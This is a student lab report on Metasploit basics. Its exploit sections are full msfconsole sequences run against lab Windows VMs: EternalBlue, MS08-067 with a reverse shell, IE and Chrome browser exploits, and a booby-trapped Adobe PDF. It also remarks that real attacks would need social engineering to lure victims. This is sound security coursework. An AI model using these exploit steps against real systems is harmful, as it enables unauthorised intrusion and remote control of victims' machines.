首页 > 其他分享 >Exp6 MSF应用基础 20201331黄文刚

Exp6 MSF应用基础 20201331黄文刚

时间:2023-05-04 20:25:52浏览次数:51  
标签:set 攻击 Exp6 20201331 漏洞 exploit windows 黄文刚 payload

Exp6 MSF应用基础
一、实验原理
(1)MSF简介

Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。

(2)程序特点

这种可以扩展的模型将负载控制,编码器,无操作生成器和漏洞整合在一起,使 Metasploit Framework 成为一种研究高危漏洞的途径。它集成了各平台上常见的溢出漏洞和流行的 shellcode ,并且不断更新。最新版本的 MSF 包含了750多种流行的操作系统及应用软件的漏洞,以及224个 shellcode 。作为安全工具,它在安全检测中有着不容忽视的作用,并为漏洞自动化探测和及时检测系统漏洞提供了有力保障。
返回目录
(3)七大模块

进入/usr/share/metasploit-framework/modules/exploits即可看到7个模块,其中evasion是在msf5中更新的,信息比较少

Exploit模块

是利用发现的安全漏洞或配置弱点对远程目标系统进行攻击,以植入和运行攻击载荷,从而获得对远程目标系统访问权的代码组件,形象的说就是攻击模块。

Payload模块

是在渗透成功后促使目标系统运行的一端植入代码,通常作用是为渗透攻击者打开在目标系统上的控制会话连接。实际上,该模块就是计算机集成的针对不同操作系统实现shellcode攻击的ruby代码。

Encoder模块

针对payload进行编码,可以通过多种编码手段、多次编码方式有效的改变payload代码特征。Encoder不改变payload作用,但能对payload进行加工。

Aux模块

能够帮助渗透测试中在进行渗透攻击之前得到的目标系统丰富的情报信息,从而发起更具目标性的精准攻击。主要包括针对各种网络服务的扫描和查点、构建虚假服务收集登录密码、口令猜测破解、敏感信息嗅探、探查敏感信息泄露、Fuzz测试发掘漏洞、实施网络协议欺骗等模块。

Post模块

支持在渗透攻击取得目标系统远程控制权之后,在受控系统中进行给各样的后渗透攻击动作。

Nops模块

是一些对程序运行状态不会造成任何实质影响的空操作或无关操作指令,最典型的空指令就是空操作,在X86 CPU体系架构平台上的操作码是0x90 因为有些代码返回地址很难确认,所以在实际中有时候会填充一大段空指令,便于快速确定返回地址的位置。

evasion模块

对攻击载荷进行”免杀”处理。
(4)常用命令

search name :用指定关键字搜索可以利用的漏洞模块
use exploit name :使用漏洞
show options :显示配置选项
set TARGET target number :设置目标版本
exploit :开始漏洞攻击
sessions -l :列出会话
sessions -i id :选择会话
sessions -k id :结束会话
Ctrl+z :把会话放到后台
Ctrl+c :结束会话

参考链接:https://zhuanlan.zhihu.com/p/387455070

二、基础问题回答
用自己的话解释什么是exploit,payload,encode。

exploit是载具,连接漏洞,将payload传送到靶机中。
payload是载荷,是exploit中shellcode中的主要功能代码,exploit把它送到靶机中后,是真正负责进行攻击代码。
encode是编码,用来改变payload,避免payload中出现漏洞无法处理的字符;其次是为了实现免杀,不让杀毒软件很轻易的就发现payload是攻击代码。

三、实验过程
(0)准备工作
①靶机下载

(win7太高版本的可能会报错)

win7迅雷下载链接:ed2k://|file|en_windows_7_ultimate_with_sp1_x64_dvd_u_677332.iso|3320903680|743598C64E635C72964CF02A3E0AD547|/

windows XP迅雷下载链接:

ed2k://|file|en_windows_xp_home_with_service_pack_3_x86_cd_x14-92413.iso|592154624|E31A555C0AB581B8610583D2D25E93BD|/

win7安装配置:https://blog.csdn.net/m0_63207326/article/details/126003875

windows XP安装配置:https://blog.csdn.net/sunyisong090630/article/details/126335463

镜像下载网站:https://msdn.itellyou.cn/
②关闭靶机防火墙

③打开445端口

④查看靶机IP地址

(1)主动攻击实践
查看版本

msfconsole

search scanner/smb/smb_

use 7

show options

set rhosts 192.168.253.136

run




查找对应利用漏洞模块

search exploit/windows/smb/

第19条攻击方式:ms17-010(win7)

查看靶机该漏洞:nmap -sS -A --script=smb-vuln-ms17-010 -PO 192.168.253.136

选择对应MSF板块,设置靶机ip地址,执行攻击:

use exploit/windows/smb/ms17_010_eternalblue

set rhost 192.168.253.136

exploit

测试攻击:ipconfig

第15条攻击方式:ms08_067(XP系统)

msfconsole

search ms08_067//查找该漏洞使用的攻击模块

use exploit/windows/smb/ms08_067_netapi//进入攻击模块

show payloads

set payload generic/shell_reverse_tcp //设置payload为反向tcp连接

set RHOST 192.168.253.138//设置靶机IP (winxp ip)

set LPORT 1202 //设置攻击机端口

set LHOST 192.168.253.132//设置攻击机IP (kali ip)

exploit


(2) 针对浏览器的攻击
查找对应利用漏洞模块

search exploit/windows/smb/

第117条攻击方式:ms10_018_ie_behaviors(win7)

use exploit/windows/browser/ms10_018_ie_behaviors

set payload windows/meterpreter/bind_tcp

set RHOST 192.168.253.136

set target 0

exploit

使用win7的IE浏览器访问http://192.168.253.132:8080/kyryAWcN8JQ

输入该网址会报错,其他网页都可以正常打开


第50条攻击方式:chrome_filereader_uaf(win7)

use exploit/windows/browser/chrome_filereader_uaf

set payload windows/meterpreter/reverse_tcp

set URIPATH /

set LHOST 192.168.48.130

exploit

靶机端在浏览器安装目录的文件夹开cmd输入C:\Program Files\Google\Chrome\Application>chrome.exe --no-sandbox以沙箱关闭的状态执行chrome.exe,在地址栏输入地址http://192.168.253.136:8080

(3)针对客户端的攻击
攻击方式:Adobe(adobe_cooltype_sing) (XP)

攻击原理:https://www.likecs.com/show-305616517.html

msfconsole //进入控制台

search adobe //进行查找

use windows/fileformat/adobe_cooltype_sing //使用漏洞

info //查看漏洞具体信息

set payload windows/meterpreter/bind_tcp //选择攻击载荷

show options //查看详细信息

set LPORT 1202//设置端口号

set RHOST 192.168.253.138//设置靶机IP地址

exploit #攻击


将生成的msf文件复制到xp中,点击回连

(可以使用cp命令将文件复制到桌面再移动,也可以使用超级用户权限进入root)

use exploit/multi/handler //进入监听模块

set payload windows/meterpreter/bind_tcp //选择攻击载荷

show options //查看详细信息

set RHOST 192.168.253.138 //设置靶机IP地址

set LPORT 1202 //设置端口号

exploit //攻击


(4)成功应用任何一个辅助模块
使用PortScan进行端口扫描

use auxiliary/scanner/portscan/tcp

show options

set rhosts 192.168.253.136

exploit






四、实验总结
离实战还缺些什么技术或步骤?

①无论是在攻击过程中针对客户端,还是浏览器,都需要被攻击者打开所需的网址和客户端,在实际攻击中这部分则需要利用社会工程学手段,诱导被攻击者打开我们想要他打开的网址和客户端,突破信息安全防御措施。

②为了使实验能够成功,我们选择的靶机版本都比较古老,也就更易于攻击因此,我们对于新的安全性更强的靶机,也需要进一步的探索。

③因为对靶机的版本漏洞的理解要求特别高,因此不管是系统版本还是软件的版本,如何找到靶机存在的未修复漏洞都是攻击重点。

标签:set,攻击,Exp6,20201331,漏洞,exploit,windows,黄文刚,payload
From: https://www.cnblogs.com/killerqueen4/p/17372378.html

相关文章

  • Exp6 MSF应用基础-20201324
    目录1实践内容1.0安装靶机1.1一个主动攻击实践,尽量使用最新的类似漏洞;主动攻击实践MS08-0671.2一个针对浏览器的攻击,尽量使用最新的类似漏洞;1.2.1针对浏览器的攻击ms06_013_createtextrange1.2.2针对浏览器的攻击MS14-0641.3一个针对客户端的攻击,如Adobe或office,尽量使用最......
  • 20201331 黄文刚 Exp3-免杀原理
    20201331黄文刚Exp3-免杀原理基础问题回答(1)杀软是如何检测出恶意代码的?目前杀毒软件的原理主要有3种:引擎与病毒库的交互作用,通过特征码提取与病毒库中的特征码进行......
  • PentestLab-web安全SQL注入-EXP6
    我们打开靶机,选择“SQL Injections”选择“Example6”观察页面我们使用工具测试参数为-u"http://192.168.29.148/sqli/example6.php?id=2"--dumpall开始测试没有发现我......
  • 20201331 黄文刚 学习笔记12(第十四章)
    20201331黄文刚学习笔记12(第十四章)一、知识点归纳以及自己最有收获的内容知识点归纳摘要本章讨论了MySQL关系数据库系统;介绍了MySQL并指出了它的重要性;展示了如何在......